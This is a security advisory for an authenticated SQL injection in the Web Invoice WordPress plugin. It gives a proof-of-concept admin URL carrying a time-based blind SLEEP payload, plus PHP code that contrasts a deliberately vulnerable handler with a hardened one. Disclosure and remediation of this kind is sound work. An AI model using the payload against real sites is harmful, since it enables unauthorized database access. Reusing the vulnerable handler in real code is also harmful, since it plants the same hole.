wpvulndb | Daniel Krohmer | WPVDB-ID: 218F8015-E14B-46A8-889D-08B2B822F8AE
History: Dec 12, 2022 - 12:00 a.m.

Web Invoice <= 2.1.3 - Authenticated SQLi

Published: 2022-12-12 00:00:00
Author: Daniel Krohmer
Source: wpscan.com
6
web invoice plugin
sql injection
authenticated exploit
admin privilege
parameter sanitization
configuration vulnerability

EPSS: 0.001 (Low)
EPSS Percentile: 43.0%

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL Injection that is exploitable by high-privilege users such as admin by default. However, depending on the plugin configuration, other users, such as subscribers, could exploit this as well: the affected action is gated by the plugin's own "Manage invoice" permission, which an administrator can grant to lower roles.

PoC

When logged in with a user allowed to Manage invoice (default admin, but this can be changed via the plugin's settings), open the following URL: https://example.com/wp-admin/admin.php?page=new_web_invoice&multiple_invoices[]=31618572+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA)&multiple_invoices[]=31618572+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA)&web_invoice_action=clear_log

The payload is a time-based blind injection: nothing is reflected in the response, so the confirmation is that the page takes at least five seconds longer to load than the same request without the SLEEP(5) subquery. Compare against a baseline request with the same parameters before concluding the injection works, since a slow host can produce a similar delay on its own.
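The following is an added illustration of the pattern the advisory describes and is not the Web Invoice plugin's code: the function names, the log table name, the nonce action and the capability checked are assumptions chosen to mirror the PoC request (a `multiple_invoices[]` array and `web_invoice_action=clear_log`). The first handler concatenates each array element into the statement, so the advisory's `31618572 AND (SELECT 5926 FROM (SELECT(SLEEP(5)))erUA)` value reaches MySQL intact; the second authorises the request, coerces every element to an integer and binds the values through `$wpdb->prepare()`.

```php
<?php
// Added illustration, not the plugin's own code. Handler names, the table
// name, the nonce action and the capability are assumptions.

// VULNERABLE pattern: user-controlled array elements are concatenated into
// the query. The PoC element "31618572 AND (SELECT 5926 FROM (SELECT(SLEEP(5)))erUA)"
// is executed as SQL, and the SLEEP(5) produces the measurable delay that
// confirms a time-based blind injection.
function wi_clear_log_vulnerable( $wpdb ) {
    $ids = isset( $_GET['multiple_invoices'] ) ? (array) $_GET['multiple_invoices'] : array();
    foreach ( $ids as $id ) {
        // Assumed log table; $id is interpolated without sanitisation or escaping.
        $wpdb->query( "DELETE FROM {$wpdb->prefix}web_invoice_log WHERE invoice_id = " . $id );
    }
}

// HARDENED pattern: authorise, then treat every element as an integer and
// let $wpdb->prepare() bind it, so the AND ... SLEEP(5) tail is discarded.
function wi_clear_log_hardened( $wpdb ) {
    // Assumed capability; the plugin's "Manage invoice" setting may map to a
    // different capability, and the advisory notes it can be reassigned.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges' );
    }
    check_admin_referer( 'web_invoice_clear_log' ); // assumed nonce action name

    $ids = isset( $_GET['multiple_invoices'] ) ? (array) wp_unslash( $_GET['multiple_invoices'] ) : array();
    // absint() casts through (int), so "31618572 AND (SELECT ...)" becomes 31618572
    // and non-numeric junk becomes 0, which array_filter() then drops.
    $ids = array_values( array_filter( array_map( 'absint', $ids ) ) );
    if ( empty( $ids ) ) {
        return 0;
    }

    // One %d placeholder per id; prepare() accepts the values as a single array.
    $placeholders = implode( ',', array_fill( 0, count( $ids ), '%d' ) );
    $sql          = "DELETE FROM {$wpdb->prefix}web_invoice_log WHERE invoice_id IN ($placeholders)";
    return $wpdb->query( $wpdb->prepare( $sql, $ids ) );
}
```

Replaying the advisory's URL against the hardened handler yields a query of the form `... WHERE invoice_id IN (31618572,31618572)` with no SLEEP, so the response time matches the baseline; against the vulnerable handler each array element runs its own SLEEP(5), so the two-element PoC is expected to stall for roughly ten seconds.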

CPE  Name         Operator  Version
     web-invoice  eq        *

